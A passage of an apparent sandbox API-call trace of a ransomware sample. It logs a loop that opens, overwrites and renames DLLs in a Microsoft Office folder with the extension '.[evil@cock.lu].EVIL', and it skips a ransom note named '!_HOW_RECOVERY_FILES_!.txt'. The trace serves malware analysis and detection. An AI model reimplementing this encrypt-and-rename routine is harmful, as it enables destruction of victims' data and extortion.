hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.637] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x48e0, lpOverlapped=0x0) returned 1 [0103.637] CloseHandle (hObject=0x1a4) returned 1 [0103.637] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.638] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.638] __uncaught_exception () returned 0x84b1160800 [0103.638] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.638] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l1-2-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l1-2-0.dll.[evil@cock.lu].evil")) returned 1 [0103.638] ??_V@YAXPEAX@Z () returned 0x1 [0103.641] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll", dwFileAttributes=0x200) returned 0 [0103.641] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.641] wcsstr (_Str="api-ms-win-core-file-l2-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.641] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 78 [0103.641] wcscmp (_String1="api-ms-win-core-file-l2-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.641] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-file-l2-1-0.dll") returned 0x0 [0103.641] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 0x4e [0103.641] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.643] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x48c0, lpOverlapped=0x0) returned 1 [0103.680] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.680] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.680] _errno () returned 0x84b1160840 [0103.680] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.680] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x48e0, lpOverlapped=0x0) returned 1 [0103.680] CloseHandle (hObject=0x1a4) returned 1 [0103.680] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.680] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.681] __uncaught_exception () returned 0x84b1160800 [0103.681] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.681] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll.[evil@cock.lu].evil")) returned 1 [0103.681] ??_V@YAXPEAX@Z () returned 0x1 [0103.684] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll", dwFileAttributes=0x200) returned 0 [0103.684] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.684] wcsstr (_Str="api-ms-win-core-localization-l1-2-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.684] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 86 [0103.684] wcscmp (_String1="api-ms-win-core-localization-l1-2-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.684] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-localization-l1-2-0.dll") returned 0x0 [0103.684] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 0x56 [0103.684] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.686] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x52c0, lpOverlapped=0x0) returned 1 [0103.698] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.698] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.698] _errno () returned 0x84b1160840 [0103.698] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.698] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x52e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x52e0, lpOverlapped=0x0) returned 1 [0103.698] CloseHandle (hObject=0x1a4) returned 1 [0103.698] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.699] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.699] __uncaught_exception () returned 0x84b1160800 [0103.699] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.699] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll.[evil@cock.lu].evil")) returned 1 [0103.699] ??_V@YAXPEAX@Z () returned 0x1 [0103.702] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll", dwFileAttributes=0x200) returned 0 [0103.702] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.702] wcsstr (_Str="api-ms-win-core-processthreads-l1-1-1.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.702] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 88 [0103.702] wcscmp (_String1="api-ms-win-core-processthreads-l1-1-1.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.702] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-processthreads-l1-1-1.dll") returned 0x0 [0103.702] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 0x58 [0103.702] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.704] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0103.735] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.735] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.735] _errno () returned 0x84b1160840 [0103.735] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.735] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0103.735] CloseHandle (hObject=0x1a4) returned 1 [0103.735] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.736] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.736] __uncaught_exception () returned 0x84b1160800 [0103.736] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.736] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll.[evil@cock.lu].evil")) returned 1 [0103.736] ??_V@YAXPEAX@Z () returned 0x1 [0103.739] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll", dwFileAttributes=0x200) returned 0 [0103.739] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.739] wcsstr (_Str="api-ms-win-core-synch-l1-2-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.739] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 79 [0103.739] wcscmp (_String1="api-ms-win-core-synch-l1-2-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.739] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-synch-l1-2-0.dll") returned 0x0 [0103.739] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 0x4f [0103.739] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.741] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0103.762] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.762] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.762] _errno () returned 0x84b1160840 [0103.763] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.763] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0103.763] CloseHandle (hObject=0x1a4) returned 1 [0103.763] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.763] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.763] __uncaught_exception () returned 0x84b1160800 [0103.763] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.763] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll.[evil@cock.lu].evil")) returned 1 [0103.764] ??_V@YAXPEAX@Z () returned 0x1 [0103.766] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll", dwFileAttributes=0x200) returned 0 [0103.767] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.767] wcsstr (_Str="api-ms-win-core-timezone-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.767] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 82 [0103.767] wcscmp (_String1="api-ms-win-core-timezone-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.767] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-timezone-l1-1-0.dll") returned 0x0 [0103.767] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 0x52 [0103.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.768] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x48c0, lpOverlapped=0x0) returned 1 [0103.789] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.789] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.789] _errno () returned 0x84b1160840 [0103.789] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.789] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x48e0, lpOverlapped=0x0) returned 1 [0103.789] CloseHandle (hObject=0x1a4) returned 1 [0103.789] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.790] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.790] __uncaught_exception () returned 0x84b1160800 [0103.790] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.790] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0103.791] ??_V@YAXPEAX@Z () returned 0x1 [0103.794] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0103.794] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.794] wcsstr (_Str="api-ms-win-core-xstate-l2-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.794] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 80 [0103.794] wcscmp (_String1="api-ms-win-core-xstate-l2-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.794] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-xstate-l2-1-0.dll") returned 0x0 [0103.794] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 0x50 [0103.794] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.796] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2d60, lpOverlapped=0x0) returned 1 [0103.824] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.824] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.824] _errno () returned 0x84b1160840 [0103.825] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.825] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2d80, lpOverlapped=0x0) returned 1 [0103.825] CloseHandle (hObject=0x1a4) returned 1 [0103.825] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.825] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.825] __uncaught_exception () returned 0x84b1160800 [0103.825] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.825] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll.[evil@cock.lu].evil")) returned 1 [0103.826] ??_V@YAXPEAX@Z () returned 0x1 [0103.829] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll", dwFileAttributes=0x200) returned 0 [0103.829] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.829] wcsstr (_Str="api-ms-win-crt-conio-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.829] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll") returned 78 [0103.829] wcscmp (_String1="api-ms-win-crt-conio-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.829] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-conio-l1-1-0.dll") returned 0x0 [0103.829] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll") returned 0x4e [0103.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.831] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4cc0, lpOverlapped=0x0) returned 1 [0103.853] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.853] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.853] _errno () returned 0x84b1160840 [0103.853] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.854] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ce0, lpOverlapped=0x0) returned 1 [0103.854] CloseHandle (hObject=0x1a4) returned 1 [0103.854] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.854] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.854] __uncaught_exception () returned 0x84b1160800 [0103.854] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.855] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0103.855] ??_V@YAXPEAX@Z () returned 0x1 [0103.859] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll", dwFileAttributes=0x200) returned 0 [0103.859] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.859] wcsstr (_Str="api-ms-win-crt-convert-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.859] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll") returned 80 [0103.859] wcscmp (_String1="api-ms-win-crt-convert-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.859] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-convert-l1-1-0.dll") returned 0x0 [0103.859] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll") returned 0x50 [0103.859] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.861] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, 